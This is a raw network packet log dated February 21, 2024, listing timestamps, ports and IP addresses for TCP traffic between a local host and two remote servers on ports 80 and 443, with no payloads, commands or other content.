Feb 21, 2024 08:14:09.149619102 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149641037 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149724007 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149738073 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149749041 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149799109 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149810076 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149812937 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149827957 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149840117 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149878025 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.149903059 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149916887 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.149930000 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150079012 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150094032 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150135040 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150141954 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150177956 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150232077 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150290966 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150316954 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150317907 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150382996 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150397062 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150408983 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150429964 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150429964 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150429964 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150454044 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150491953 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150516987 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150530100 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150547981 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150557995 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150599957 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150615931 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150620937 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150655031 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150718927 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150785923 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150840998 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150854111 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150929928 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150929928 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.150949955 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.150965929 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151004076 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151030064 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151061058 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151163101 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151166916 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151233912 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151279926 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151293039 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151305914 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151329041 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151329041 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151345015 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151370049 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151392937 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151422024 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151457071 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151480913 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151510000 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151523113 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151534081 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151562929 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151563883 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151578903 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151649952 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151676893 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151681900 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151715994 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151745081 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151813030 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151824951 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151837111 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151850939 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151876926 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151876926 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151900053 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.151900053 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.151915073 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152089119 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152101994 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152118921 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.152137041 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152157068 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152264118 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.152267933 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152293921 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152338028 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152343988 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.152375937 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152436018 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152471066 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.152494907 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152508020 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152519941 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152549982 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.152563095 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.152563095 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.152616978 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152630091 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152678967 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152693033 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152734995 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152736902 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.152736902 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.152863979 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152878046 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152889967 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152982950 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.152983904 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.152985096 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.153009892 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153032064 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153060913 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153131962 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153143883 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153158903 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153170109 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.153184891 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.153204918 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153243065 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153255939 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153289080 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153306007 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.153306007 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.153342009 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153356075 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153484106 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153516054 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153538942 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153582096 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.153582096 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.153582096 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.153620958 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153634071 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153669119 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153697014 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153740883 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.153763056 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.153763056 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.154206991 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.154282093 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.154311895 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.154489994 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.154541016 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.154629946 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.154664993 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.154719114 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.154792070 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.154867887 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.154869080 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.154941082 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.154966116 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.155056953 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.155112028 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.155181885 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.155291080 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.155361891 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.155440092 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.155440092 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.155452013 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.155534983 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.155596018 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.155610085 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.155687094 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.155766010 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.155854940 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.155951023 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156043053 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156070948 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.156115055 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156286955 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156333923 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156337023 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.156398058 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.156471014 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156559944 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156651974 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156693935 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156707048 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156750917 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.156816006 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.156868935 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.157056093 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.157136917 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.157228947 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.157305002 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.157321930 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.157421112 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.157541037 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.157562971 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.157634020 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.157672882 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.157696009 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.157802105 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.157911062 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.157958031 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158016920 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158067942 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158149004 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158149958 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.158199072 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158265114 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158341885 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158358097 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.158386946 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158422947 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.158435106 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158485889 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.158510923 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158586025 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158689976 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.158773899 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158854008 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158910036 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.158998013 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.159017086 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159051895 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159079075 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159102917 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.159167051 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159249067 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159344912 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159372091 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.159372091 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.159410954 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159543991 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159581900 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.159590960 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159643888 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.159714937 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159847021 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159889936 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.159974098 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.160080910 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.160134077 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.160175085 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.160260916 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.160310984 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.160343885 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.160605907 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.160715103 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.160770893 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.160805941 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.160868883 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.160969019 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.161000013 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.161099911 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.161217928 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.161231041 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.161319017 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.161361933 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.161566019 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.161734104 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.161766052 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.161820889 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.161971092 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.161986113 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.161998987 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.162079096 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.162154913 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.162158012 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.162183046 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.162221909 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.162261963 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.162275076 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.162384987 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.318135023 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.318461895 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.318490028 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.318779945 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.319256067 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.319256067 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.319277048 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.319314957 CET	443	49720	142.250.65.228	192.168.2.5
Feb 21, 2024 08:14:09.359049082 CET	49720	443	192.168.2.5	142.250.65.228
Feb 21, 2024 08:14:09.364506006 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364528894 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364543915 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364561081 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364578962 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364593029 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364607096 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364634991 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.364658117 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364674091 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364685059 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.364721060 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.364725113 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364742041 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364774942 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.364778996 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364792109 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364804029 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364818096 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364856958 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364875078 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364887953 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.364888906 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364945889 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364959002 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364965916 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.364965916 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.364970922 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.364988089 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365005016 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.365020037 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365052938 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.365080118 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365097046 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365108967 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365123034 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365147114 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.365147114 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.365190029 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365212917 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365261078 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365323067 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.365405083 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365427017 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.365525961 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365542889 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365586042 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365602016 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365619898 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365634918 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365654945 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.365670919 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.365678072 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365708113 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365721941 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365757942 CET	49716	80	192.168.2.5	5.101.153.86
Feb 21, 2024 08:14:09.365783930 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365833998 CET	80	49716	5.101.153.86	192.168.2.5
Feb 21, 2024 08:14:09.365905046 CET	49716	80	192.168.2.5	5.101.153.86
